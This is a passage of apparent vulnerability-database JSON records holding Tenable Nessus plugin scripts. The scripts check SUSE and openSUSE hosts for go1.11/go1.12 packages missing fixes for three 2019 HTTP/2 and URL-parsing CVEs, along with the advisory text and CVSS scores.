go1.12 fixes the following issues :\n\nSecurity issues fixed :\n\n - CVE-2019-9512: Fixed HTTP/2 flood using PING frames that\n results in unbounded memory growth (bsc#1146111).\n\n - CVE-2019-9514: Fixed HTTP/2 implementation that is\n vulnerable to a reset flood, potentially leading to a\n denial of service (bsc#1146115).\n\n - CVE-2019-14809: Fixed malformed hosts in URLs that leads\n to authorization bypass (bsc#1146123).\n\nBugfixes :\n\n - Update to go version 1.12.9 (bsc#1141689).\n\n - Adding Web Assembly stuff from misc/wasm (bsc#1139210).\n\nThis update was imported from the SUSE:SLE-15:Update update project.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1139210\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1141689\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1146111\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1146115\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1146123\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected go1.12 packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-14809\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/08/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/09/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/09/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:go1.12\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:go1.12-race\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.1\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.1\", reference:\"go1.12-1.12.9-lp151.2.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"go1.12-race-1.12.9-lp151.2.21.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"go1.12 / go1.12-race\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2023-02-10T14:50:53", "description": "This update for go1.12 fixes the following issues :\n\nSecurity issues fixed :\n\n - CVE-2019-9512: Fixed HTTP/2 flood using PING frames that results in unbounded memory growth (bsc#1146111).\n\n - CVE-2019-9514: Fixed HTTP/2 implementation that is vulnerable to a reset flood, potentially leading to a denial of service (bsc#1146115).\n\n - CVE-2019-14809: Fixed malformed hosts in URLs that leads to authorization bypass (bsc#1146123).\n\nBugfixes :\n\n - Update to go version 1.12.9 (bsc#1141689).\n\n - Adding Web Assembly stuff from misc/wasm (bsc#1139210).\n\nThis update was imported from the SUSE:SLE-15:Update update project.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-09-09T00:00:00", "type": "nessus", "title": "openSUSE Security Update : go1.12 (openSUSE-2019-2085) (Ping Flood) (Reset Flood)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-14809", "CVE-2019-9512", "CVE-2019-9514"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:go1.12", "p-cpe:/a:novell:opensuse:go1.12-race", "cpe:/o:novell:opensuse:15.1"], "id": "OPENSUSE-2019-2085.NASL", "href": "https://www.tenable.com/plugins/nessus/128605", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2019-2085.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(128605);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2019-14809\", \"CVE-2019-9512\", \"CVE-2019-9514\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0643\");\n\n script_name(english:\"openSUSE Security Update : go1.12 (openSUSE-2019-2085) (Ping Flood) (Reset Flood)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for go1.12 fixes the following issues :\n\nSecurity issues fixed :\n\n - CVE-2019-9512: Fixed HTTP/2 flood using PING frames that\n results in unbounded memory growth (bsc#1146111).\n\n - CVE-2019-9514: Fixed HTTP/2 implementation that is\n vulnerable to a reset flood, potentially leading to a\n denial of service (bsc#1146115).\n\n - CVE-2019-14809: Fixed malformed hosts in URLs that leads\n to authorization bypass (bsc#1146123).\n\nBugfixes :\n\n - Update to go version 1.12.9 (bsc#1141689).\n\n - Adding Web Assembly stuff from misc/wasm (bsc#1139210).\n\nThis update was imported from the SUSE:SLE-15:Update update project.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1139210\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1141689\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1146111\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1146115\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1146123\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected go1.12 packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-14809\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/08/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/09/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/09/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:go1.12\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:go1.12-race\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.1\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.1\", reference:\"go1.12-1.12.9-lp151.2.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"go1.12-race-1.12.9-lp151.2.17.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"go1.12 / go1.12-race\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2023-02-09T15:06:43", "description": "This update for go1.11 fixes the following issues :\n\nSecurity issues fixed :\n\nCVE-2019-9512: Fixed HTTP/2 flood using PING frames that results in unbounded memory growth (bsc#1146111).\n\nCVE-2019-9514: Fixed HTTP/2 implementation that is vulnerable to a reset flood, potentially leading to a denial of service (bsc#1146115).\n\nCVE-2019-14809: Fixed malformed hosts in URLs that leads to authorization bypass (bsc#1146123).\n\nBugfixes: Update to go version 1.11.13 (bsc#1141688).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-08-26T00:00:00", "type": "nessus", "title": "SUSE SLED15 / SLES15 Security Update : go1.11 (SUSE-SU-2019:2213-1) (Ping Flood) (Reset Flood)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-14809", "CVE-2019-9512", "CVE-2019-9514"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:go1.11", "p-cpe:/a:novell:suse_linux:go1.11-doc", "p-cpe:/a:novell:suse_linux:go1.11-race", "cpe:/o:novell:suse_linux:15"], "id": "SUSE_SU-2019-2213-1.NASL", "href": "https://www.tenable.com/plugins/nessus/128146", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2019:2213-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(128146);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2019-14809\", \"CVE-2019-9512\", \"CVE-2019-9514\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0643\");\n\n script_name(english:\"SUSE SLED15 / SLES15 Security Update : go1.11 (SUSE-SU-2019:2213-1) (Ping Flood) (Reset Flood)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for go1.11 fixes the following issues :\n\nSecurity issues fixed :\n\nCVE-2019-9512: Fixed HTTP/2 flood using PING frames that results in\nunbounded memory growth (bsc#1146111).\n\nCVE-2019-9514: Fixed HTTP/2 implementation that is vulnerable to a\nreset flood, potentially leading to a denial of service (bsc#1146115).\n\nCVE-2019-14809: Fixed malformed hosts in URLs that leads to\nauthorization bypass (bsc#1146123).\n\nBugfixes: Update to go version 1.11.13 (bsc#1141688).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1141688\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1146111\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1146115\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1146123\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-14809/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-9512/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-9514/\");\n # https://www.suse.com/support/update/announcement/2019/suse-su-20192213-1/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?71d9c5c4\");\n script_set_attribute(attribute:\"solution\", value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Module for Open Buildservice Development Tools\n15-SP1:zypper in -t patch\nSUSE-SLE-Module-Development-Tools-OBS-15-SP1-2019-2213=1\n\nSUSE Linux Enterprise Module for Open Buildservice Development Tools\n15:zypper in -t patch\nSUSE-SLE-Module-Development-Tools-OBS-15-2019-2213=1\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-14809\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/08/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/08/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/08/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:go1.11\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:go1.11-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:go1.11-race\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED15|SLES15)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED15 / SLES15\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES15\" && (! preg(pattern:\"^(0|1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES15 SP0/1\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED15\" && (! preg(pattern:\"^(0|1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED15 SP0/1\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES15\", sp:\"1\", cpu:\"x86_64\", reference:\"go1.11-race-1.11.13-1.18.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"go1.11-1.11.13-1.18.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"go1.11-doc-1.11.13-1.18.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"go1.11-1.11.13-1.18.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"go1.11-doc-1.11.13-1.18.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", cpu:\"x86_64\", reference:\"go1.11-race-1.11.13-1.18.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"go1.11-1.11.13-1.18.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"go1.11-doc-1.11.13-1.18.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"go1.11-1.11.13-1.18.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"go1.11-doc-1.11.13-1.18.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"go1.11\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2023-02-10T14:48:42", "description": "This update for go1.12 fixes the following issues :\n\nSecurity issues fixed :\n\nCVE-2019-9512: Fixed HTTP/2 flood using PING frames that results in unbounded memory growth (bsc#1146111).\n\nCVE-2019-9514: Fixed HTTP/2 implementation that is vulnerable to a reset flood, potentially leading to a denial of service (bsc#1146115).\n\nCVE-2019-14809: Fixed malformed hosts in URLs that leads to authorization bypass (bsc#1146123).\n\nBugfixes: Update to go version 1.12.9 (bsc#1141689).\n\nAdding Web Assembly stuff from misc/wasm (bsc#1139210).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-08-26T00:00:00", "type": "nessus", "title": "SUSE SLED15 / SLES15 Security Update : go1.12 (SUSE-SU-2019:2214-1) (Ping Flood) (Reset Flood)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-14809", "CVE-2019-9512", "CVE-2019-9514"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:go1.12", "p-cpe:/a:novell:suse_linux:go1.12-doc", "p-cpe:/a:novell:suse_linux:go1.12-race", "cpe:/o:novell:suse_linux:15"], "id": "SUSE_SU-2019-2214-1.NASL", "href": "https://www.tenable.com/plugins/nessus/128147", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2019:2214-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(128147);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2019-14809\", \"CVE-2019-9512\", \"CVE-2019-9514\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0643\");\n\n script_name(english:\"SUSE SLED15 / SLES15 Security Update : go1.12 (SUSE-SU-2019:2214-1) (Ping Flood) (Reset Flood)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for go1.12 fixes the following issues :\n\nSecurity issues fixed :\n\nCVE-2019-9512: Fixed HTTP/2 flood using PING frames that results in\nunbounded memory growth (bsc#1146111).\n\nCVE-2019-9514: Fixed HTTP/2 implementation that is vulnerable to a\nreset flood, potentially leading to a denial of service (bsc#1146115).\n\nCVE-2019-14809: Fixed malformed hosts in URLs that leads to\nauthorization bypass (bsc#1146123).\n\nBugfixes: Update to go version 1.12.9 (bsc#1141689).\n\nAdding Web Assembly stuff from misc/wasm (bsc#1139210).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1139210\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1141689\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1146111\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1146115\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1146123\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-14809/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-9512/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-9514/\");\n # https://www.suse.com/support/update/announcement/2019/suse-su-20192214-1/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e174d045\");\n script_set_attribute(attribute:\"solution\", value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Module for Open Buildservice Development Tools\n15-SP1:zypper in -t patch\nSUSE-SLE-Module-Development-Tools-OBS-15-SP1-2019-2214=1\n\nSUSE Linux Enterprise Module for Open Buildservice Development Tools\n15:zypper in -t patch\nSUSE-SLE-Module-Development-Tools-OBS-15-2019-2214=1\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-14809\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/08/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/08/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/08/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:go1.12\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:go1.12-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:go1.12-race\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED15|SLES15)$\", string:os_ver)) 